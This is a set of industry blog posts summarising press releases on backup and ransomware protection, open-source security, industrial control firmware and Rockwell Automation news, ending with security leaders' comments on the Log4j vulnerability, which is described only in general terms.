by Gary Mintchell | Mar 7, 2022 | Enterprise IT, Operations Management, Security, Software
I used to use Retrospect to back up files on my Macs. Not sure why I stopped, probably a compatibility issue with MacOS at the time. It did the job for me, though. But I was surprised to get some news from StorCentric, the company behind Retrospect, announcing an update. Something I’ll have to check out again.
Retrospect, a StorCentric company, announced the general availability (GA) of Retrospect Backup 18.5, featuring new anomaly detection, customizable filtering and thresholds, and enhanced ransomware protection to help businesses quickly detect and protect against malicious attacks. With deeper Microsoft Azure Blob integration for Immutable Backups and integrated cloud bucket creation, Retrospect Backup 18.5’s anomaly detection and ransomware protect bolsters StorCentric’s data-centric security approach to organizations’ critical infrastructure.
According to Coveware, most corporate targets are small and medium businesses. 72% of targeted businesses have fewer than 1,000 employees, and 37% have fewer than 100. Businesses are projected to have paid out $20B in 2021, a 100% Y-o-Y increase for the last four years, and it’s only going to get worse with new business models like RaaS: ransomware-as-a-service. With Retrospect Backup 18, businesses can protect their infrastructure with immutable backups for ransomware protection.
Included in Retrospect Backup 18.5
▪ Anomaly Detection: Detect anomalies in systems based on customizable filters and thresholds tailored to individual environments.
▪ Retrospect Management Console Integration: View anomalies across a business or partner’s entire client base in a single pane of glass.
▪ Improved Microsoft Azure Blob Integration: Set individual immutable retention policies for different backup sets within the same Azure Storage Container.
▪ Streamlined Immutable Backup User Experience: Automatically create cloud buckets with immutable backups supported by default.
▪ LTO-9 Support: Includes support for LTO-9, with capacities up to 18TB (45TB compressed).
by Gary Mintchell | Mar 2, 2022 | Automation, Security
News coming my way over the past couple of years has changed. There is very little from automation, control, instrumentation, and even networking. Two consistent visitors to my inbox are combined in this news from the Linux Foundation—Open Source and Security. This news touts the growth of the Open Source Security Foundation.
The Open Source Security Foundation (OpenSSF) a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important open source security initiatives, announced 19 new organizations have joined OpenSSF to help identify and fix security vulnerabilities in open source software and develop improved tooling, training, research, best practices, and vulnerability disclosure practices. It is also announcing the latest milestones achieved across a variety of its technical initiatives, all of which underscore the cross-industry momentum taking place as a result of increasing awareness in the wake of recent security incidents and since the recent White House Open Source Security Summit and recent Congressional hearings.
“The time is clearly now for this community to make real progress on software security. Since open source is the foundation on which all software is built, the work we do at OpenSSF with contributions from companies and individuals from around the world is fundamental to that progress,” said Brian Behlendorf, executive director at OpenSSF. “We’ve never had more support or focus on building, sustaining and securing the software that underpins all of our lives, and we’re happy to be the neutral forum where this can happen.”
New Premier Member commitments come from 1Password, Citi, Coinbase, Huawei Technologies, JFrog and Wipro. New General Member commitments come from Accuknox, Alibaba Cloud, Block, Inc., Blockchain Technology Partners, Catena Cyber, Chainguard, DeployHub, Gravitational Inc., MongoDB, NCC Group, ReversingLabs, Spotify and Wingtecher Technology. New Associate Members include Institute of Software, Chinese Academy of Science (ISCAS), MITRE and OpenUK. A complete review of the OpenSSF member roster.
These commitments come on the heels of the recent White House Open Source Security Summit where the Linux Foundation and OpenSSF represented hundreds of its project communities and discussed how best to support software security and open source security posture going forward. This underscored a major milestone in the Linux Foundation’s engagement with the public sector and underscores its position to support not only the projects it hosts but all of the world’s most critical open source infrastructure.
Following are examples of community work.
OpenSSF also recently announced the Alpha-Omega Project to improve the security posture of open source software (OSS) through direct engagement of software security experts and automated security testing. It is initially supported by Microsoft and Google with a combined investment of $5 million. The Project improves global OSS supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open source code, and get them fixed. “Alpha” will work with the maintainers of the most critical open source projects to help them identify and fix security vulnerabilities, and improve their security posture. “Omega” will identify at least 10,000 widely deployed OSS projects where it can apply automated security analysis, scoring, and remediation guidance to their open source maintainer communities.
Scorecards is an OpenSSF project that helps open source users understand the risks of the dependencies they consume. OpenSSF members GitHub and Google recently announced Scorecards v4, which includes Scorecards GitHub Workflow Action to automate identification of how changes to a project affected its security. It also includes License Check to detect the presence of a project license and Dangerous-Workflow check to detect dangerous usage of the pull_request_target trigger and risks of script injections in GitHub workflows. The Scorecards project has also increased the scale of scans from 50,000 projects to one million projects identified as most critical based on their number of direct dependencies, giving a more detailed view of the ecosystem and strengthening supply chain security as users see improved coverage of their dependencies.
by Gary Mintchell | Jan 27, 2022 | Automation, Embedded Control, News, Security
Bedrock Automation Founder, CEO and CTO Albert Rooyakkers and I have had several energetic discussions regarding the open, secure, and automation pillars of the Bedrock Automation control solution. I always ask founders and CEOs in this market how they think they can possibly upend the leaders. In this case, independent observers tell me that Bedrock has found a niche within certain industry segments that require its specific benefits.
This news release points to a recent software upgrade making it easier to configure and run open applications inside the “Open Secure Automation” (OSA) controllers, simplify and improve SCADA redundancy, enable TLS support for MQTT Sparkplug, expand universal EtherNet/IP capacity, simplify flow meter proving, and assist in diagnosing large motors.
A quick aside—Sparkplug is an open information model standard developed by MQTT evangelists that I would label as “OPC UA lite”. Check out Cirrus Link for better and more detailed descriptions.
The new firmware affects the Bedrock OSA control system, the OSA Remote control system, Universal Ethernet module (UE5), and the OSA Remote +Flow measurement and control system.
The new Bedrock firmware enhancements move redundancy management from the SCADA system client to the Bedrock controller firmware. This enables seamless and flawless failover while simplifying SCADA configuration. The SCADA software then needs to point to only one IP address and the Bedrock controllers will find the active path automatically.
This software release improves throughput and diagnostics for the Bedrock Ethernet gateway modules. It includes both status and diagnostic information from EtherNet/IP and Modbus TCP devices connected to a Bedrock Universal Ethernet I/O module (UE5).
New control firmware in the Bedrock OSA Remote supports the J1939 and CANopen CAN bus communication standard, which extends open secure automation for control and factory automation. Using J1939 CAN bus, for example, the Bedrock OSA Remote can be configured as an RTU to read RPMs from large motors to diagnose performance.
The Bedrock OSA Remote +Flow computer application now supports K-Factor and meter factor linearization with user-entered linearization curves. The OSA +Flow now also supports double chronometry for select high speed counter channels. The OSA +Flow application takes advantage of this new feature to support meter proving using displacement provers, including small volume provers.
All software will be standard on all relevant systems immediately. All current Bedrock OSA users can upgrade remotely at no charge.
by Gary Mintchell | Jan 5, 2022 | Data Management, Enterprise IT, Operations Management, Security, Software
The types of products and services covered here keeps expanding with technology and application requirements change. It’s the new year prompting reflection on the past and the future. I just happened upon a LinkedIn conversation about an article in Automation World about PAC versus PLC. That seems so 20 years ago. Yet, the discussion in Germany involves PC-based control versus PLCs. Meanwhile, I’m looking at all the data technologies required for the efficient operation of a plant or factory. This news came involves the hot topics of data and security.
And I won’t be ignoring the Consumer Electronics Show starting today in Las Vegas. Several companies have pulled out of the live experience, but I’ve begun getting CES news. I never go to that show, but I’ve been to two and survived. We’ll see how that one works out. It’s amazing the technologies we’ll see at CES that will be industrial before you know it.
StorCentric, provider of a comprehensive portfolio of secure data management solutions, today announced Nexsan Unity software version 7.0, which includes important enhancements to power enterprise-class security, compliance and ransomware protection. The new Unity software now supports Object (S3) protocol, and data-centric security features such as immutable snapshots and object locking. This release also offers up to a 40% performance increase over Nexsan Unity version 6.1.
This massive growth in data combined with significant changes in the way we work today and a rapid rise in cybercrime has driven increased demands and challenges for enterprise data center managers. The new Unity software enhancements are designed to address these issues and redefine how StorCentric channel partners and customers store, manage and protect data at scale.
Available in Nexsan Unity v7.0:
Protocol Support
– Object (S3) Protocol – Unity is now a true unified solution, supporting Block (iSCSI, FC), File (NFS, CIFS/SMB) and now Object (S3) protocols.
Security, Compliance and Ransomware Protection
– Immutable Snapshots – Unity now supports immutable volume and file system snapshots for data protection. This provides secure point-in-time copies of data for business continuity.
– Object Locking – Unity now supports object locking, enabling bucket or object-level protection for a specified retention period to create immutable copies of data. This allows enterprises to address compliance, regulatory and other data protection requirements.
– Data Integrity – Unity supports pool-scrubbing to detect and remediate bit rot to avoid data corruption.
Performance Improvements
– Total Throughput has increased up to 13GB/s on the existing platforms.
– Up to 50% increase in Unity to Assureon Ingest Rate – Significantly improves the efficiency of the Unbreakable Backup solution.
by Gary Mintchell | Dec 24, 2021 | Cloud, Commentary, Data Management, Manufacturing IT, News, Security, Standards, Workforce
The first business trip involving airplane and car in 18 months took me to Houston in November to Automation Fair, the Rockwell Automation user conference and trade show. They offered five press conferences via remote conferencing. I felt the urge to visit with people in person. Several thousand visitors wandered the show floor along with me. And I sat in the press conferences in person with a couple of editors from Control, a couple of analysts from ARC Advisory Group, an editor I didn’t know for one session, and an editor from Automation World for one other session. It felt good to be back, but this was hardly like old times. I was not rushed from appointment to appointment—I had no appointments.
The content was not like old times. No motor control or programmable controllers, although I did look up a PLC product person on the show floor to dive into a couple of things. The press conferences were somewhat IT oriented with cybersecurity and cloud, workforce issues around culture and diversity, and sustainability. Following are summaries of the press conferences and of three news items released at the show.
Cybersecurity Steps Needed for 2022
No discussion of industrial technology can begin without considering cybersecurity. Angela Rapko (Regional Vice President, Lifecycle Services, Rockwell Automation), Shoshana Wodzisz (Manager, Product Security, Rockwell Automation), and Theodore Haschke (Manager, Business Development, Functional Safety & Cybersecurity, TUV Rheinland) talked standards with us. High-profile cyber and ransomware attacks rocked the manufacturing industry in 2021 and raised government attention to the need for stronger oversight to protect businesses worldwide. Global cybersecurity standards have been established based on guidance from industry leaders for both the IT and OT level, but adoption still wanes. We’ll share how businesses can utilize standards to improve security in 2022, and why OT can’t be left behind when updating best practices.
Leveraging Culture and DEI as a Competitive Advantage
Bobby Griffin (Chief Diversity, Equity & Inclusion Officer, Rockwell Automation) and Becky House (Senior Vice President & Chief People & Legal Officer, Rockwell Automation) discussed how many companies have put a more intentional focus on company culture and DEI – but how do you know you’re having the right impact? Diversity, equity, and inclusion are core principles at Rockwell. This has a KPI associated and manager’s compensation is tied to it. Among other things, check out the senior leadership page on the Rockwell website. There are women on it. And a couple of other faces that are not old white men. There is a refreshing mix of ages, genders, ethnicities.
Why Cloud? Why Now? Three Factors Driving Adoption of SAAS-Based Solutions
I could understand the discussion of cybersecurity, which can be expected given the several-year-old vision of Rockwell regarding the Connected Enterprise. The discussion of computing in the cloud would never have happened with a straight face even three years ago. Maybe two. Let us consider two very recent acquisitions of cloud-based companies—Plex and Fiix. Brian Shepherd (Senior Vice President, Software & Control, Rockwell Automation), James Novak (Chief Executive Officer, Fiix), and Bill Berutti (Chief Executive Officer, Plex) joined us for a discussion of the companies, products, and benefits of cloud. Yet another sign of a rapidly changing Rockwell Automation.
Using Data to Drive Productivity and Sustainability
Rockwell Automation has had sustainability goals and solutions for many years. This topic remains a key focus for the corporation. Tom O’Reilly (Vice President, Sustainability, Rockwell Automation) and Arvind Rao (Director, Product Management & Head of Industry Solutions, Rockwell Automation) met with us to discuss how “customers and investors are demanding that we do business in ways that are more productive and more sustainable.” Operational data and analytics can reduce waste, improve quality, and reduce energy, all while driving increased productivity and delivering results against sustainability initiatives.
Three Strategies for Creating an Agile and Flexible Workforce
Rachael Conrad (Vice President & General Manager, Customer Support & Maintenance, Rockwell Automation) and Sherman Joshua (Director, Workforce & Competency, Lifecycle Services, Rockwell Automation) revealed Rockwell’s on key strategies for creating an agile and flexible workforce post pandemic and how manufacturers can leverage their workforce as their greatest asset.
New Initiatives to Bolster Cybersecurity Offering for Customers
Rockwell Automation, Inc. announced new investments to enhance its information technology (IT) and operational technology (OT) cybersecurity offering. These initiatives include strategic partnerships with Dragos, Inc. and CrowdStrike, as well as the establishment of a new Cybersecurity Operations Center in Israel.
Rockwell and Dragos, a global leader in cybersecurity for industrial control systems (ICS)/OT environments, have announced a partnership that combines Rockwell’s global industry, application, and ICS domain expertise with Dragos’s world-class technology, professional services, and threat intelligence services. The partnership will focus on incident response services and threat intelligence.
Rockwell and CrowdStrike, a leader in cloud-delivered endpoint and workload protection, have formed a partnership to deliver end-to-end cybersecurity and network service solutions to customers. The partnership will examine initiatives for CrowdStrike’s cloud-native, AI-powered Falcon platform with Rockwell’s global deployment, network architecture, support, OT, and managed services capabilities to deliver differentiated solutions that address customer cybersecurity pain points.
Rockwell Automation Expands Supply Chain Services with Acquisition of AVATA
Rockwell Automation, Inc. has acquired AVATA, a leading services provider for supply chain management, enterprise resource planning, and enterprise performance management solutions. AVATA has significant domain expertise in enterprise applications and is a leading consultant and systems integrator for Oracle cloud software applications.
By significantly improving end-to-end supply chain visibility and management, AVATA, together with Kalypso, Rockwell’s industrial digital transformation services business, will help further unlock the value of information technology/operational technology (IT/OT) convergence that Rockwell can deliver to customers. AVATA will be integrated into Kalypso, which is a part of Rockwell’s Lifecycle Services business.
AVATA supports Rockwell’s recent cloud-native investments, building on its open architecture to extend the digital thread and enable powerful integrations with other leading technologies, now including Plex and Oracle Cloud.
Rockwell Automation and Battery Pioneer Cadenza Innovation to Explore Driving Energy Storage and Advance Sustainability
Rockwell Automation has begun collaborating with Cadenza Innovation, the award-winning provider of safe, low cost, and energy-dense Lithium-ion-based storage solutions, to define a strategic relationship including a shared goal of building the industry’s highest performance battery cell production lines.
During 2022 the companies intend to collaborate to develop a customer cloud portal to manage deployed distributed energy resources, an end-to-end battery manufacturing execution system (MES), and equipment automation to support the expansion of Cadenza Innovation’s battery manufacturing in the US and abroad.
Rockwell Automation and Cadenza Innovation intend to create a full digital thread that feeds information from business systems to the factory floor and subsequently out to the field-deployed energy storage systems to ‘close the loop’ by feeding data from the field back into Cadenza Innovation’s connected operations. This, in turn, will ensure peak performance of customer systems.
by Gary Mintchell | Dec 15, 2021 | Commentary, News, Security
One of the more difficult things I do concerns filtering press releases to figure out which are hype and which have some enduring relevance. The first one I received about the Log4J exploit seemed over the top. However, this one appears to have legs. Best practices tell us to take action and be concerned. Following are a number of statements from security leaders. Take note of these.
This from my host platform, Cloudflare, “Last Friday we sent you an email about a zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228). We advised you that Cloudflare had immediately updated our WAF to help protect you against this vulnerability. We also recommended that all organizations that use Log4j immediately update to the newest version to mitigate exploit attacks. The latest version can be found at the Log4j download page.”
Glen Pendley, Deputy CTO at Tenable, “Log4Shell, a critical vulnerability in Apache Log4j, shines a bright light on the risky practice of relying on open-source code libraries to build enterprise-scale applications. Many organizations around the world rely on open-source libraries as a key element in their ability to bring applications to market quickly. Yet, these libraries often stop short of a security-first approach. This dependence on what is effectively a wild, wild west of code libraries will continue to leave organizations vulnerable until time and resources are invested to make them more secure.”
And from Paul Laudanski, Head of Threat Intelligence at Tessian, “The log4j vulnerability has created endless golden opportunities for bad actors – and they know it and are getting creative. What they’re trying to do now is build an arsenal of tools that they can use across the globe for theft and service disruption, especially ahead of the holiday season. DDoS attacks in particular are a top concern, as exploitation could allow bad actors to download, install and then fully control an army of botnets. DDoS operators can then focus on attacks that bring down critical infrastructure – ranging from utilities to power grid – and especially retailers ahead of the holiday season, a time when people are notoriously distracted, tired and more prone to making security mistakes. Couple that with an increase in moratoriums, when no code is released into production, so emergency patches would require a break of that moratorium.
Meanwhile, there’s also the concern that the original CVE will end up generating subsequent CVEs, potentially exponentially multiplying its impact, similarly to the follow-on bugs we saw after SolarWinds. Luckily, log4j only has one in 2021 so far, but I wouldn’t be surprised if other related flaws are found soon. However, it’s worth noting one silver lining: white hats are working tirelessly to train folks on how to identify the vulnerability, so most teams will now be properly educated and informed on the growing threat.”
From the blog of Nozomi Networks, “At the end of last week (Friday, December 10), the cybersecurity world became aware of a new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE). Coupled with the popularity of this tool, multiple companies and commercial applications have become affected by it. It received a codename Log4Shell. In addition to promptly deploying several protection mechanisms for our customers, Nozomi Networks set up a honeypot to monitor the situation and became aware of all potential global scans and exploitation attempts.”
“Apache quickly categorized the vulnerability as critical due to the simplicity of the attack and the number of susceptible platforms and systems. All an attacker has to do is send a malicious string that would be logged by the server. Minecraft users were exploiting servers using the chat function, and Twitter users could trigger the exploit by changing their display names, as could iPhone users by changing their phone name. In this post, we provide some technical details related to how malware authors immediately started taking advantage of this vulnerability.”
Further from Amit Yoran, Chairman and CEO, Tenable, “Just as we warned, Log4Shell is unleashing holy hell on businesses everywhere. And the worst is yet to come if organizations don’t take immediate action.
Researchers are already observing ransomware activities as cybercriminals begin utilizing Log4Shell in their playbooks. Let me be clear, these ransomware activities are not going to go away – they will only increase like wildfire thanks in part to this new, perfect payload in the form of Log4Shell. Organizations need to take swift and decisive action as Log4Shell can and will completely undermine your security program.
No vendor’s product is a silver bullet to solve this problem. Eliminating the threat posed by Log4Shell requires hard work and time to understand this vulnerability and how it will morph and evolve over time to bypass protective measures.”
